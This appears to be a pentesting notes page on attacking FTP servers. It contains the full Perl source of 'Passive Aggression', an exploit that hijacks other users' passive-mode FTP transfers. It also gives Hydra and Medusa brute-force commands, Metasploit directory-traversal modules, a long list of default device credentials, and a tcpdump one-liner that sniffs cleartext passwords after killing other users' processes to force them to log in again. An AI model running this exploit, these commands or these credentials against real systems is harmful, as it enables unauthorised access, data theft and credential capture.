Passive Aggression v1.0

Exploits FTP servers using passive mode to transfer data.

#!/usr/bin/perl
###############
#
# Passive Aggression v1.0
#
# Exploits FTP servers using passive mdoe to transfer data.
# 
# Usage:  ./pasvagg.pl ftp.cdrom.com anonymous h4x0r@hotmail.com
#
# Copyright (C) 2000 H.D. Moore <hdm@digitaloffense.net>
#
# https://www.digitaloffense.net/
#
##

use IO::Socket;
use IO::Select;

sub usage {
    print "Usage: $0 [hostname] <username> <password>\n";
    exit(-1);
}

sub scanport {
    my ($port) = @_;
    my $s;
    
    $s = IO::Socket::INET->new (        PeerAddr    => $host,
                                        PeerPort    => $port,
                                        Proto       => "tcp",
                                        Type        => SOCK_STREAM
                                    ) || return;
    if (fork())
    {
        return;
    } else {
        $bytes = 0;
        $reader = 0;
        $SIG{'INT'} = 'IGNORE';
        $filename = "$host-$port.dmp";
        
        my $sel = IO::Select->new();
        $sel->add($s);
        
        @ready = $sel->can_read(5);
        foreach $fh (@ready)
        {
            $data = <$fh>;
            if (length($data) == 0) { next; }
            $bytes += length($data);
            print "\n:: reader ".length($data)." found on $host:$port\n";
            $reader++;
            open (DMP, ">".$filename) || die "could not create dump file:  $!";
            print DMP $data;
            $sel->remove if eof($fh);
        }

        
        if ($reader)
        {
            $0 = "PASV Aggression: downloading from $host:$port";
            while ($line = <$s>)
            {
                $bytes += length($line);
                print DMP $line;
            }
            close(DMP);
            print "\n:: finished transfer of $bytes bytes from $host:$port\n";
        } else {
           print "\n:: ?writer? found on port $port\n"; 
           print $s "REAPER\r\n";
        }
        close($s);

        exit;
    } 
}

sub LoginToServer {
    my ($socket) = @_;
    my @ready;
    my $fh;
    
    $response = <$socket>;
    chomp($response);

    if ($response !~ m/^220/)
    {
        print "server gave us a bad response:  $response\n";
        close($socket);
        exit;
    }
    print ">> $response\n";
    print ":: logging into server as $username.\n";

    print $socket "USER $username\r\n";

    $response = <$socket>;
    chomp($response);
    while ($response !~ m/^331/)
    {
        if ($response =~ m/^5/)
        {
            print ":: ERROR:\n";
            print ">> $response\n";
            exit;
        }
        print ">> $response\n";
        $response = <$socket>;
        chomp($response);
    }
    print ">> $response\n";
    
    
    print $socket "PASS $password\r\n";
    $response = <$socket>;
    chomp($response);
    while ($response !~ m/^230/)
    {
        if ($response !~ m/^2/)
        {
            print ":: ERROR:\n";
            print ">> $response\n";
            exit;
        }
        print ">> $response\n";
        $response = <$socket>;
        chomp($response);
    }
    print ">> $response\n";
    
    print $socket "PASV\r\n";
    $response = <$socket>;
    chomp($response);
    while ($response !~ m/^227/)
    {
        if ($response !~ m/^2/)
        {
            print ":: ERROR:\n";
            print ">> $response\n";
            exit;
        }
        print ">> $response\n";
        $response = <$socket>;
        chomp($response);
    }
    print ">> $response\n";
    print ":: server ready for passive attack\n";
}

sub GetCurrentPort { 
    my ($socket) = @_;
    my $PORT;
    my (@address,$p1, $p2);
    
    print $socket "PASV\r\n";
    $response = <$socket>;
    chomp($response); 
    $response =~ m/(\(.*)/;
    $PORT = $1;
    $PORT =~ s/\(|\)|\.//g;
    ($address[0],$address[1],$address[2],$address[3],$p1,$p2) = split(/\,/,$PORT);
    $ip = join(".", @address);
    return DecodePort($p1,$p2);
}

sub DecodePort {
    my ($p1,$p2) = @_;
    return unpack "N", pack "B32","0" x 16 . substr((unpack "B32",pack "N", $p1),24,8).substr((unpack "B32",pack "N", $p2),24,8);
   
}

###################
#      MAIN       #
###################

$host = shift() || usage();
$username = shift() || "anonymous";
$password = shift() || "mozilla\@";


$| = 1;
@PortSample = ();
$CmdLatency = 0;
$now = 0;
$0 = "PASV Aggression: control process";

$socket = IO::Socket::INET->new (   PeerAddr    => $host,
                                    PeerPort    => 21,
                                    Proto       => "tcp",
                                    Type        => SOCK_STREAM
                                ) || die "could not connect to server:  $!";       
print ":: connected to $host\n";
LoginToServer($socket);



print ":: sampling passive port selection\n";
for ($cnt = 0; $cnt < 10; $cnt ++)
{
    $now = time();
    $PortSample[$cnt] = GetCurrentPort($socket);
    $CmdLatency += time() - $now;
    sleep(1);
}
if ($PortSample[0] > $PortSample[9])
{
    $rate = (($PortSample[9] + 65535) - $PortSample[0]) / 10;   
} else {
    $rate = (($PortSample[9]) - $PortSample[0]) / 10;
}
$latency = $CmdLatency / 10;

print ":: passive connection rate = $rate/sec\n";
print ":: passive command latency = $latency seconds\n";
print ":: starting the reaper engine\n\n";

while (1)
{
    $start = sprintf("%d", ($rate * $latency) + GetCurrentPort($socket));
    print "\r                                             ";
    print "\r:: starting port $start\n";
    for ($port = $start; $port < $start + 15; $port++)
    {
        print "\r                                             ";
        print "\r:: scanning port ($port)";
        scanport($port);
    }
}
FTP (21)

Enumeration

Banner Grabbing

telnet 10.10.10.10 21

Anonymous Access

ftp 10.10.10.10

Username: anonymous OR anon

Password: any

Bruteforce

Hydra

hydra -t 1 -l admin -P ~/password-list.txt -vV 10.10.10.10 ftp

Medusa

medusa -h 10.10.10.10 -u admin -P ~/password-list.txt -M ftp

MiTM

https://labs.p64cyber.com/passive-aggression-v1-0/null

FTP Fuzzing

A Metasploit module that will connect to an FTP server and perform pre and post-authentication fuzzing. – Suggested by @_tmap

use auxiliary/fuzzers/ftp/ftp_pre_post

Metasploit

Anonymous FTP Access Detection

Detect anonymous (read/write) FTP server access.

use auxiliary/scanner/ftp/anonymous

BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure

This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as ‘..//.’

use auxiliary/scanner/ftp/bison_ftp_traversal

ColoradoFTP Server 1.3 Build 8 Directory Traversal Information Disclosure

use auxiliary/scanner/ftp/colorado_ftp_traversal

This module exploits a directory traversal vulnerability found in ColoradoFTP server version <= 1.3 Build 8. This vulnerability allows an attacker to download and upload arbitrary files from the server GET/PUT command including file system traversal strings starting with ‘\’. The server is written in Java and therefore platform independent, however this vulnerability is only exploitable on the Windows version.

Easy File Sharing FTP Server 3.6 Directory Traversal

use auxiliary/scanner/ftp/easy_file_sharing_ftp

This module exploits a directory traversal vulnerability found in Easy File Sharing FTP Server Version 3.6 and Earlier. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command that includes file system traversal strings such as ‘../’

Authentication Scanner

This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

use auxiliary/scanner/ftp/ftp_login

Version Scanner

Detect FTP Version.

use auxiliary/scanner/ftp/ftp_version

Konica Minolta FTP Utility 1.00 Directory Traversal Information Disclosure

This module exploits a directory traversal vulnerability found in Konica Minolta FTP Utility 1.0. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command that includes file system traversal strings such as ‘..//’

use auxiliary/scanner/ftp/konica_ftp_traversal

PCMan FTP Server 2.0.7 Directory Traversal Information Disclosure

This module exploits a directory traversal vulnerability found in PCMan FTP Server 2.0.7. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command that includes file system traversal strings such as ‘..//’

use auxiliary/scanner/ftp/pcman_ftp_traversal 

Titan FTP XCRC Directory Traversal Information Disclosure

This module exploits a directory traversal vulnerability in the XCRC command implemented in versions of Titan FTP up to and including 8.10.1125. By making sending multiple XCRC command, it is possible to disclose the contents of any file on the drive with a simple CRC “brute force” attack. Although the daemon runs with SYSTEM privileges, access is limited to files that reside on the same drive as the FTP server’s root directory.

use auxiliary/scanner/ftp/titanftp_xcrc_traversal

FTP Configuration Files

Nix

/etc/vsftpd/vsftpd.conf
/etc/apache2/mods-available/proxy_ftp.conf
apt-ftparchive.conf
ftp-archive.conf

Windows

ApplicationHost.config

Default Username/Passwords

anonymous:anonymous
root:rootpasswd
root:12hrs37
ftp:b1uRR3
admin:admin
localadmin:localadmin
admin:1234
apc:apc
admin:nas
Root:wago 
Admin:wago 
User:user 
Guest:guest 
ftp:ftp
admin:password
a:avery
admin:123456
adtec:none
admin:admin12345
none:dpstelecom
instrument:instrument
user:password
root:password
default:default
admin:default
nmt:1234
admin:Janitza
supervisor:supervisor
user1:pass1
avery:avery
IEIeMerge:eMerge
ADMIN:12345
beijer:beijer
Admin:admin
admin:1234
admin:1111
root:admin
se:1234
admin:stingray
device:apc
apc:apc
dm:ftp
dmftp:ftp
httpadmin:fhttpadmin
user:system
MELSEC:MELSEC
QNUDECPU:QNUDECPU
ftp_boot:ftp_boot
uploader:ZYPCOM
ftpuser:password
USER:USER
qbf77101:hexakisoctahedron
ntpupdate:ntpupdate
sysdiag:factorycast@schneider
wsupgrade:wsupgrade
pcfactory:pcfactory
loader:fwdownload
test:testingpw
webserver:webpages
fdrusers:sresurdf
nic2212:poiuypoiuy
user:user00
su:ko2003wa
MayGion:maygion.com
admin:9999
PlcmSpIp:PlcmSpIp

Searchsploit Results

tcpdump, a digital predator capable of giving low-level hackers god-like powers

TCP Dump

tcpdump is a powerful command-line packet analyzer; and libpcap, a portable C/C++ library for network traffic capture.

Why do We Care?

Passive Eavesdropping. Low priv user escalation.

About Passive Eavesdropping

  • Kill process and make them re-auth
  • Listen for clear text credentials
  • Find new hosts and endpoints
  • Surveillance

Pentests

One of my favourite things to do on tests is to kill processes I know other users/admins are using that auth using protocols I can either downgrade or see in plaintext, this method is highly effective as the user will have to re-auth giving you the credentials you need. I can’t tell you how many times I have priv. esc’d with only tcpdump.

Example:

Here we sniff traffic as low-level user, open in Wireshark, follow TCP stream and voila, we have password 🙂

DC info and password masked as this example is taken from an active CTF style box.

Tactical Command

tcpdump port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B5 -A5

One of my favourite things to do on tests is to kill processes I know other users/admins are using that auth using protocols I can either downgrade or see in plaintext, this method is highly effective as the user will have to re-auth giving you the credentials you need,

oracle@box#: ps
1392 process-to-kill
oracle@box#: kill -9 1392
oracle@box#: tcpdump port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B5 -A5